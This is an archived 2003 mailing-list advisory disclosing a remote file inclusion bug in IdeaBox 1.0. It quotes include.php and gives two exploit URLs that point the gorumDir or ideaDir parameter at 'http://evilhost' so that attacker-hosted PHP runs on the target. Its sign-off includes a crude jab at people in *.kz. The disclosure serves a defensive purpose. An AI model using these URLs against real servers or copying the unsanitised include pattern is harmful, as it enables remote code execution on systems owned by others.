=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: IdeaBox: Remote Command Execution product: IdeaBox 1.0 vendor: http://ideabox.phpoutsourcing.com risk: high date: 04/25/2k3 discovered by: euronymous /F0KP advisory urls: http://f0kp.iplus.ru/bz/022.en.txt http://f0kp.iplus.ru/bz/022.ru.txt contact email: euronymousat_private =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= IdeaBox 1.0 have a multiple include bugs. For example, this is include.php source code: <?php include("$gorumDir/generformlib_date.php"); include("$gorumDir/notification.php"); include("$ideaDir/user.php"); include("$ideaDir/globalsettings.php"); include("$ideaDir/init.php"); include("$ideaDir/idea.php"); include("$ideaDir/history.php"); include("$ideaDir/cord.php"); ?> Evil surfer can exploit this hole as following: http://hostname/ideabox/include.php?gorumDir=http://evilhost with http://evilhost/notification.php or http://hostname/ideabox/include.php?ideaDir=http://evilhost with http://evilhost/cord.php shouts: DWC, DHG, HUNGOSH, security.nnov.ru, Black Tigerz Research Group, The N0b0D1eS, all russian security guyz!! to kate especially )) hates: slavomira and other dirty ppl in *.kz $#%&^! k0dsweb team ================ im not a lame, not yet a hacker ================
This archive was generated by hypermail 2b30 : Tue Apr 29 2003 - 10:21:23 PDT